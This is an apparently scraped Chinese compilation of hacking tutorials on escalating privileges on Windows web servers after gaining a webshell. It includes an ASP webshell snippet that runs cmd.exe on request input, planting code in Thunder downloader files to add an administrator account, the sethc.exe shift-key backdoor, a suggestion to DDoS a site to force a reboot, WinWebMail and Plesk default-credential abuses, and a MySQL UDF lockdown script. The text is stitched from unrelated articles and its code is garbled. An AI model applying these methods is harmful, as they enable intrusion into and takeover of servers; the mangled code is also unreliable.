以下是小编为大家准备了没有Wscript.shell组件提权我们该怎么办呢?(共含7篇),欢迎参阅。同时,但愿您也能像本文投稿人“醴汤”一样,积极向本站投稿分享好文章。
来源:情毒
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了,就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
<%
end if
response.write(”“)
On Error Resume Next
response.write oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
response.write(””)
response.write(”“)
response.write(”
“)
response.write(””)
%>
保存为一个asp文件,然后传到网站目录上去
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
我用此成功运行过cacls命令。
第二那就是运行时出错,可能限制某些代码执行
无wscript.shell组件提权又一个方法
<%if err then%>
<%
end if
response.write(”
rows=20>”)
On Error Resume Next
response.write
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
response.write(””)
response.write(”
Kindle‘s blog
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,
把我们所下载东西添加到列表当中,
所对应的htm文件有2处一处是C:Program FilesThunder NetworkThunderProgramgeturl.htm
一处是C:Program FilesThunder NetworkThunderProgramgetAllurl.htm
如果我们想把我们想要的代码添加进去执行了?
我们简单写个代码试试,代码如下:
应该大家都可以看的出,如果我们把这段代码添加到那2个htm文件里,当迅雷下载东西的时候,一样
会去执行我们的代码,
添加一个administrators组的一个用户kindle
当然,代码大家可以自定义的..
测试通过,迅雷版本为5.9.2.927
我先给大家说下我webshell的环境吧,
无 wscript.shell 组件,我记得网上有这么一篇文章: wscript.shell 上传个cmd.asp 可以执行命令,但我试过,
却无法显示网页。我一般拿到webshell 就要看
C:Documents and SettingsAdministrator「开始」菜单
C:Documents and SettingsAll Users「开始」菜单
这两个地址,简单确认下服务器安装的有哪些软件,可以利用某些软件漏洞来进行提权,很可惜这两个目
录都不能查看。
在扫描一下目标主机开放的有哪些端口,只有21 和 80 ,1433 我之后查看到到F盘内有几个文件目录可
以浏览我仔细看了下,原来有几个同服务器下的网站程序备份在F盘内,并且已经打包好了的,我点击下载
肯定是行不通的。我巧用webshell 把该文件复制到该站的目录里,接着就可以顺利下载了,嘿嘿~~下载成
功以后我查看到原来是一个DZ论坛程序,我查看到配置信息,我想可以利用mysql 提权了,上传了个
su.php上去,结果被杀,接着我对这个脚本进行300次循环加密,希望可以躲过杀软,待我在上传上去,结
果还是被杀,我想,应该是权限的原因,后来我随便找了个网站上的一个文件 rss.asp,进行修改为su.php
里的脚本,保存成功之后,还是被杀毒软件杀掉了rss.asp 这个文件,我汗~~最后我在网上找到一个可以连
接mysql 的工具,
工具名为:MYsql Tool 我也不知道行不行的通,填写好以后,还是连接不上。
最后我查看到了可以访问C:WINDOWSSYSTEM32 这个目录,也就是这个文章的重点。很多朋友可能都
知道五下shift后门这个吧?但却很少人知道原理。
后门原理
shift
这样我们就可以执行命令,或者调用桌面程序了。也可以换句话说,可以为所欲为了。
本当我想这么做的时候,可惜权限不允许,不允许我删除 上传等,接着我又巧用了webshell,把原文件
sethc.exe移动到另外个目录或者盘符,然后我在上传我的shift后门,重命名为sethc.exe到原网站目录,在
复制或者移动到system32这个目录,就这样就拿到系统权限了。如遇到win2K 则需要重启后有效,怎么使
他重启,这就要看你了。不过我有个馊主意,你用肉鸡DDos以后在联系管理员说他网站被D了,之后管理
员有可能会重启下服务器,这下你就可以上去了。o(∩_∩)o...
我们的分享和交流只是为了能让自己进步一点点,能带给基友们一点点帮助,可是在交流的过程中遇见了能提权的shell被人删除的情况,真想不通陌生的基友你为什么要这样自私呢,做个黑产拿几百个shell回去卖,你能富有吗?
第一:了解一些简单的虚拟主机识别
常见的虚拟主机识别:
星外虚拟主机主机D:freehostzhoudeyangwebPrim@Hosting 一般很难找到可执行目录,可以测试用远程调用cmd,exp来提权
虚拟主机D:hostingwwwroot vhostroot
分支D:VhostWebRoot51dancecn vhostrootD:vhostrootlocaluser
星外分支D:vhostrootLocalUsergdrt
新网虚拟主机D:virtualhostweb580651www 可以找到很多可执行目录,但是目前基本上大部分为windows 系统,提权有难度
华众虚拟主机E:wwwrootlongzhihuwwwroot 一般有安全模式
星外分支F:hostwz8088web
万网虚拟主机F:usrfw04408xpinfo 支持aspx的话应该能扫到可执行目录
其他的虚拟主机可以使用reg.aspx,getacl.aspx配合来识别
第二:是不是能找到可执行目录
主要asp.php和aspx的,我在这里主要介绍ASPX的:
Reg.aspx从注册表读取目录
Getacl.aspx遍历目录以及文件,获取当前用户可控制的目录或者文件
一、WinWebMail程序安装为系统服务,程序一般是在admin权限下运行的,而服务程序emsvr.exe是在system权限下运行的,这样,我们就可以通过这个漏洞来提升权限了,假设我们得到了一个低权的WebShell,有修改权限,服务器安装有WinWebMail,我们只要能够修改其中的opusers.ini文件,就可以利用这个漏洞提升权限了,加用户、开端口就随你了。
在硬盘分区为NTFS格式下,WinWebMail会要求安装目录为everyone可写,这是因为它是Web服务式的邮件系统,需要通过ASP文件读写用户邮箱,也就是对应于某个用户名的文件夹,而普通的ASP程序解析权限很低,所以必须得让WinWebMail所在的目录拥有everyone可写权限,不然程序会无法正常读写这些用户文件夹的。在FAT32格式下就更不用说了,我们可以随意修改popusers.ini文件,从而溢出获得更高权限了。
最后再说说远程利用的方法。因为我们可以通过Web来注册用户,所以可以利用抓包软件来修改注册信息,从而间接修改ini文件,等到服务器
重启的时候,就可以利用漏洞了。
该漏洞影响范围到3.7.3.1以前的版本
————————————————————————————————————
就是winwebmail邮件服务器系统,用户名和密码全部存在winwebmail的安装目录中popusers.ini文件里面!包括admin管理员用户!当然,密码是加密的!
我们要做的,就是在本地装一个相同版本的winwebmail,然后将本地加密过的已经密码代码,利用webshell替换掉服务器上的,这台mail服务器就到手了!(说白了还是因为WinWebMail会要求安装目录为everyone可写)
————————————————————————————————————
WinWebMail目录下的web必须设置everyone权限可读可写,不然邮件登陆不上去等等,所以在开始程序里找到winwebmail快捷方式下下来,看路径,访问 路径web传shell,访问shell后,默认权限是system,放远控进启动项,等待下次重启,
没有删cmd组建的直接加用户。
比如c:winwebmailweb,如果不能浏览换为d:winwebmailweb(一定要是web目录,本人多方测试c:winwebmail一样无权浏览)
另外如果查不出路径请用注册表读取:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinWebMail Serverimagepath
二、7i24的web目录也是可写,权限为administrator。
注: 7i24目录默认是可读可写,写进IISSAFE那个目录,访问 lan3a.com/iissafe/shell.asp
三、装有Magic Winmail的服务器会在系统上开启8080端口,对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解析。Magic Winmail是不可以解析asp脚本的,Magic Winmail这边是php的世界。
X:Magic Winmailserverwebmail 该目录默认为system权限
网管在装Magic Winmail的时候肯定是以system级别的身份装的。当然Magic Winmail就继承了system级别的限权,而我们的Magic Winmail却可以解析php脚本,想当然我们可爱的php脚本就是system级别的脚本了。这个Magic Winmail软件有点像咱国产Netbox的味道。
这款虚拟机在国外比较流行,安全性能也很高,在这里记录下提权方法。
1.mysql的admin(原root)默认密码(setup)没改,通过mysql提权
2.Parallels Plesk Control Panel,在8880端口,默认用户名密码admin:setup
3.有注入点的情况下,db权限下写文件到启动项
删除udf.dll和langouster_udf.dll,新建udf.dll和langouster_udf.dll设为只读,权限上限制 可防止所有langouster_udf.dll专用网马
程序代码
net stop mysql
del %SystemRoot%system32udf.dll /A/F/Q
del %SystemRoot%udf.dll /A/F/Q
del %SystemRoot%tempudf.dll /A/F/Q
dir %SystemRoot%system32com > %SystemRoot%system32udf.dll
dir %SystemRoot%system32com > %SystemRoot%udf.dll
dir %SystemRoot%system32com > %SystemRoot%tempudf.dll
attrib +R +S +H %SystemRoot%system32udf.dll
attrib +R +S +H %SystemRoot%udf.dll
attrib +R +S +H %SystemRoot%tempudf.dll
cscript.exe xcacls.vbs “%SystemRoot%system32udf.dll” /D Everyone:M /E
cscript.exe xcacls.vbs “%SystemRoot%udf.dll” /D Everyone:M /E
cscript.exe xcacls.vbs “%SystemRoot%tempudf.dll” /D Everyone:M /E
del %SystemRoot%system32langouster_udf.dll /A/F/Q
del %SystemRoot%langouster_udf.dll /A/F/Q
del %SystemRoot%templangouster_udf.dll /A/F/Q
dir %SystemRoot%system32com > %SystemRoot%system32langouster_udf.dll
dir %SystemRoot%system32com > %SystemRoot%langouster_udf.dll
dir %SystemRoot%system32com > %SystemRoot%templangouster_udf.dll
attrib +R +S +H %SystemRoot%system32langouster_udf.dll
attrib +R +S +H %SystemRoot%langouster_udf.dll
attrib +R +S +H %SystemRoot%templangouster_udf.dll
cscript.exe xcacls.vbs “%SystemRoot%system32langouster_udf.dll” /D Everyone:M /E
cscript.exe xcacls.vbs “%SystemRoot%langouster_udf.dll” /D Everyone:M /E
cscript.exe xcacls.vbs “%SystemRoot%templangouster_udf.dll” /D Everyone:M /E
net start mysql
★ 迅雷提权教程
★ 我们没有在一起
